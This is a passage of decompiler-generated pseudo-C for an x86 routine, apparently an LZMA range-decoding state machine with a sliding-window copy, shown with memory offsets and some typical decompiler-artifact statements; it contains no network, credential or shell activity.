                                                                      											__eax =  *(__ebp - 4);
                                                                      											__ecx =  *(__ebp - 0x38);
                                                                      											 *(__ebp - 0x84) = 8;
                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                      											goto L132;
                                                                      										case 8:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x38);
                                                                      												__ecx =  *(__ebp - 4);
                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                      												 *(__ebp - 0x84) = 9;
                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                      											}
                                                                      											goto L132;
                                                                      										case 9:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												goto L90;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x60);
                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                      												goto L171;
                                                                      											}
                                                                      											__eax = 0;
                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      											__eflags = _t259;
                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                      											goto L76;
                                                                      										case 0xa:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__eax =  *(__ebp - 4);
                                                                      												__ecx =  *(__ebp - 0x38);
                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                      												goto L132;
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x28);
                                                                      											goto L89;
                                                                      										case 0xb:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												__ecx =  *(__ebp - 0x24);
                                                                      												__eax =  *(__ebp - 0x20);
                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      											} else {
                                                                      												__eax =  *(__ebp - 0x24);
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x28);
                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      											L89:
                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      											L90:
                                                                      											__eax =  *(__ebp - 4);
                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                      											goto L69;
                                                                      										case 0xc:
                                                                      											L100:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t335 = __ebp - 0x70;
                                                                      											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t335;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											__eax =  *(__ebp - 0x2c);
                                                                      											goto L102;
                                                                      										case 0xd:
                                                                      											L37:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t122 = __ebp - 0x70;
                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t122;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L39:
                                                                      											__eax =  *(__ebp - 0x40);
                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      												goto L48;
                                                                      											}
                                                                      											__eflags = __ebx - 0x100;
                                                                      											if(__ebx >= 0x100) {
                                                                      												goto L54;
                                                                      											}
                                                                      											L41:
                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      											__ecx =  *(__ebp - 0x58);
                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      											 *(__ebp - 0x48) = __eax;
                                                                      											__eax = __eax + 1;
                                                                      											__eax = __eax << 8;
                                                                      											__eax = __eax + __ebx;
                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      											__ax =  *__esi;
                                                                      											 *(__ebp - 0x54) = __esi;
                                                                      											__edx = __ax & 0x0000ffff;
                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      												__cx = __ax;
                                                                      												 *(__ebp - 0x40) = 1;
                                                                      												__cx = __ax >> 5;
                                                                      												__eflags = __eax;
                                                                      												__ebx = __ebx + __ebx + 1;
                                                                      												 *__esi = __ax;
                                                                      											} else {
                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                      												0x800 = 0x800 - __edx;
                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *__esi = __cx;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      												goto L39;
                                                                      											} else {
                                                                      												goto L37;
                                                                      											}
                                                                      										case 0xe:
                                                                      											L46:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t156 = __ebp - 0x70;
                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t156;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											while(1) {
                                                                      												L48:
                                                                      												__eflags = __ebx - 0x100;
                                                                      												if(__ebx >= 0x100) {
                                                                      													break;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												__edx = __ebx + __ebx;
                                                                      												__ecx =  *(__ebp - 0x10);
                                                                      												__esi = __edx + __eax;
                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      												__ax =  *__esi;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__edi = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													_t170 = __edx + 1; // 0x1
                                                                      													__ebx = _t170;
                                                                      													__cx = __ax >> 5;
                                                                      													__eflags = __eax;
                                                                      													 *__esi = __ax;
                                                                      												} else {
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edi;
                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													continue;
                                                                      												} else {
                                                                      													goto L46;
                                                                      												}
                                                                      											}
                                                                      											L54:
                                                                      											_t173 = __ebp - 0x34;
                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                      											__eflags =  *_t173;
                                                                      											goto L55;
                                                                      										case 0xf:
                                                                      											L58:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t203 = __ebp - 0x70;
                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t203;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L60:
                                                                      											__eflags = __ebx - 0x100;
                                                                      											if(__ebx >= 0x100) {
                                                                      												L55:
                                                                      												__al =  *(__ebp - 0x44);
                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                      												goto L56;
                                                                      											}
                                                                      											L61:
                                                                      											__eax =  *(__ebp - 0x58);
                                                                      											__edx = __ebx + __ebx;
                                                                      											__ecx =  *(__ebp - 0x10);
                                                                      											__esi = __edx + __eax;
                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      											__ax =  *__esi;
                                                                      											 *(__ebp - 0x54) = __esi;
                                                                      											__edi = __ax & 0x0000ffff;
                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      												__cx = __ax;
                                                                      												_t217 = __edx + 1; // 0x1
                                                                      												__ebx = _t217;
                                                                      												__cx = __ax >> 5;
                                                                      												__eflags = __eax;
                                                                      												 *__esi = __ax;
                                                                      											} else {
                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                      												0x800 = 0x800 - __edi;
                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *__esi = __cx;
                                                                      											}
                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      												goto L60;
                                                                      											} else {
                                                                      												goto L58;
                                                                      											}
                                                                      										case 0x10:
                                                                      											L110:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t366 = __ebp - 0x70;
                                                                      											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t366;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											goto L112;
                                                                      										case 0x11:
                                                                      											L69:
                                                                      											__esi =  *(__ebp - 0x58);
                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                      											L132:
                                                                      											 *(_t612 - 0x54) = _t605;
                                                                      											goto L133;
                                                                      										case 0x12:
                                                                      											goto L0;
                                                                      										case 0x13:
                                                                      											__eflags =  *(__ebp - 0x40);
                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                      												_t469 = __ebp - 0x58;
                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                      												__eflags =  *_t469;
                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                      												 *(__ebp - 0x40) = 8;
                                                                      												goto L144;
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x4c);
                                                                      											__ecx =  *(__ebp - 0x58);
                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                      											 *(__ebp - 0x30) = 8;
                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                      											goto L130;
                                                                      										case 0x14:
                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                      											__eax =  *(__ebp - 0x80);
                                                                      											L140:
                                                                      											 *(_t612 - 0x88) = _t533;
                                                                      											goto L1;
                                                                      										case 0x15:
                                                                      											__eax = 0;
                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      											__al = __al & 0x000000fd;
                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                      											goto L121;
                                                                      										case 0x16:
                                                                      											__eax =  *(__ebp - 0x30);
                                                                      											__eflags = __eax - 4;
                                                                      											if(__eax >= 4) {
                                                                      												_push(3);
                                                                      												_pop(__eax);
                                                                      											}
                                                                      											__ecx =  *(__ebp - 4);
                                                                      											 *(__ebp - 0x40) = 6;
                                                                      											__eax = __eax << 7;
                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                      											 *(__ebp - 0x58) = __eax;
                                                                      											goto L145;
                                                                      										case 0x17:
                                                                      											goto L145;
                                                                      										case 0x18:
                                                                      											L146:
                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t484 = __ebp - 0x70;
                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                      											__eflags =  *_t484;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											L148:
                                                                      											_t487 = __ebp - 0x48;
                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                      											__eflags =  *_t487;
                                                                      											goto L149;
                                                                      										case 0x19:
                                                                      											__eflags = __ebx - 4;
                                                                      											if(__ebx < 4) {
                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                      												L120:
                                                                      												_t394 = __ebp - 0x2c;
                                                                      												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                      												__eflags =  *_t394;
                                                                      												L121:
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												__eflags = __eax;
                                                                      												if(__eax == 0) {
                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                      													goto L170;
                                                                      												}
                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                      													goto L171;
                                                                      												}
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                      												__eax =  *(__ebp - 0x30);
                                                                      												_t401 = __ebp - 0x60;
                                                                      												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                      												__eflags =  *_t401;
                                                                      												goto L124;
                                                                      											}
                                                                      											__ecx = __ebx;
                                                                      											__eax = __ebx;
                                                                      											__ecx = __ebx >> 1;
                                                                      											__eax = __ebx & 0x00000001;
                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                      											__al = __al | 0x00000002;
                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                      											__eflags = __ebx - 0xe;
                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                      											if(__ebx >= 0xe) {
                                                                      												__ebx = 0;
                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                      												L103:
                                                                      												__eflags =  *(__ebp - 0x48);
                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                      													__eax = __eax + __ebx;
                                                                      													 *(__ebp - 0x40) = 4;
                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                      													__eflags = __eax;
                                                                      													L109:
                                                                      													__ebx = 0;
                                                                      													 *(__ebp - 0x58) = __eax;
                                                                      													 *(__ebp - 0x50) = 1;
                                                                      													 *(__ebp - 0x44) = 0;
                                                                      													 *(__ebp - 0x48) = 0;
                                                                      													L113:
                                                                      													__eax =  *(__ebp - 0x40);
                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                      														_t392 = __ebp - 0x2c;
                                                                      														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                      														__eflags =  *_t392;
                                                                      														goto L120;
                                                                      													}
                                                                      													__eax =  *(__ebp - 0x50);
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      													__eax =  *(__ebp - 0x58);
                                                                      													__esi = __edi + __eax;
                                                                      													 *(__ebp - 0x54) = __esi;
                                                                      													__ax =  *__esi;
                                                                      													__ecx = __ax & 0x0000ffff;
                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                      														__ecx = 0;
                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                      														__ecx = 1;
                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                      														__ebx = 1;
                                                                      														__ecx =  *(__ebp - 0x48);
                                                                      														__ebx = 1 << __cl;
                                                                      														__ecx = 1 << __cl;
                                                                      														__ebx =  *(__ebp - 0x44);
                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                      														__cx = __ax;
                                                                      														__cx = __ax >> 5;
                                                                      														__eax = __eax - __ecx;
                                                                      														__edi = __edi + 1;
                                                                      														__eflags = __edi;
                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                      														 *__esi = __ax;
                                                                      														 *(__ebp - 0x50) = __edi;
                                                                      													} else {
                                                                      														 *(__ebp - 0x10) = __edx;
                                                                      														0x800 = 0x800 - __ecx;
                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      														 *__esi = __dx;
                                                                      													}
                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      														L112:
                                                                      														_t369 = __ebp - 0x48;
                                                                      														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                      														__eflags =  *_t369;
                                                                      														goto L113;
                                                                      													} else {
                                                                      														goto L110;
                                                                      													}
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0xc);
                                                                      												__ebx = __ebx + __ebx;
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                      													__ecx =  *(__ebp - 0x10);
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                      													__ebx = __ebx | 0x00000001;
                                                                      													__eflags = __ebx;
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													L102:
                                                                      													_t339 = __ebp - 0x48;
                                                                      													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                      													__eflags =  *_t339;
                                                                      													goto L103;
                                                                      												} else {
                                                                      													goto L100;
                                                                      												}
                                                                      											}
                                                                      											__edx =  *(__ebp - 4);
                                                                      											__eax = __eax - __ebx;
                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                      											goto L109;
                                                                      										case 0x1a:
                                                                      											L56:
                                                                      											__eflags =  *(__ebp - 0x64);
                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x68);
                                                                      											__al =  *(__ebp - 0x5c);
                                                                      											__edx =  *(__ebp - 8);
                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                      											__ecx =  *(__ebp - 0x14);
                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                      											__eax = __ecx + 1;
                                                                      											__edx = 0;
                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                      											__edx = _t192;
                                                                      											goto L80;
                                                                      										case 0x1b:
                                                                      											L76:
                                                                      											__eflags =  *(__ebp - 0x64);
                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                      												goto L170;
                                                                      											}
                                                                      											__eax =  *(__ebp - 0x14);
                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                      												__eflags = __eax;
                                                                      											}
                                                                      											__edx =  *(__ebp - 8);
                                                                      											__cl =  *(__eax + __edx);
                                                                      											__eax =  *(__ebp - 0x14);
                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                      											 *(__eax + __edx) = __cl;
                                                                      											__eax = __eax + 1;
                                                                      											__edx = 0;
                                                                      											_t275 = __eax %  *(__ebp - 0x74);
                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                      											__edx = _t275;
                                                                      											__eax =  *(__ebp - 0x68);
                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      											_t284 = __ebp - 0x64;
                                                                      											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                      											__eflags =  *_t284;
                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                      											L80:
                                                                      											 *(__ebp - 0x14) = __edx;
                                                                      											goto L81;
                                                                      										case 0x1c:
                                                                      											while(1) {
                                                                      												L124:
                                                                      												__eflags =  *(__ebp - 0x64);
                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                      													break;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                      													__eflags = __eax;
                                                                      												}
                                                                      												__edx =  *(__ebp - 8);
                                                                      												__cl =  *(__eax + __edx);
                                                                      												__eax =  *(__ebp - 0x14);
                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                      												 *(__eax + __edx) = __cl;
                                                                      												__eax = __eax + 1;
                                                                      												__edx = 0;
                                                                      												_t415 = __eax %  *(__ebp - 0x74);
                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                      												__edx = _t415;
                                                                      												__eax =  *(__ebp - 0x68);
                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                      												__eflags =  *(__ebp - 0x30);
                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                      												 *(__ebp - 0x14) = _t415;
                                                                      												if( *(__ebp - 0x30) > 0) {
                                                                      													continue;
                                                                      												} else {
                                                                      													L81:
                                                                      													 *(__ebp - 0x88) = 2;
                                                                      													goto L1;
                                                                      												}
                                                                      											}
                                                                      											 *(__ebp - 0x88) = 0x1c;
                                                                      											L170:
                                                                      											_push(0x22);
                                                                      											_pop(_t567);
                                                                      											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                      											_t535 = 0;
                                                                      											L172:
                                                                      											return _t535;
                                                                      									}
                                                                      								}
                                                                      								L171:
                                                                      								_t535 = _t534 | 0xffffffff;
                                                                      								goto L172;
                                                                      							}
                                                                      						}
                                                                      						__eax =  *(__ebp - 0x50);
                                                                      						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                      						__eax =  *(__ebp - 0x58);
                                                                      						__esi = __edx + __eax;
                                                                      						 *(__ebp - 0x54) = __esi;
                                                                      						__ax =  *__esi;
                                                                      						__edi = __ax & 0x0000ffff;
                                                                      						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      						if( *(__ebp - 0xc) >= __ecx) {
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      							__cx = __ax;
                                                                      							__cx = __ax >> 5;
                                                                      							__eax = __eax - __ecx;
                                                                      							__edx = __edx + 1;
                                                                      							 *__esi = __ax;
                                                                      							 *(__ebp - 0x50) = __edx;
                                                                      						} else {
                                                                      							 *(__ebp - 0x10) = __ecx;
                                                                      							0x800 = 0x800 - __edi;
                                                                      							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                      							 *__esi = __cx;
                                                                      						}
                                                                      						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      							goto L148;
                                                                      						} else {
                                                                      							goto L146;
                                                                      						}
                                                                      					}
                                                                      					goto L1;
                                                                      				}
                                                                      			}








                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x004070f0
                                                                      0x004070f4
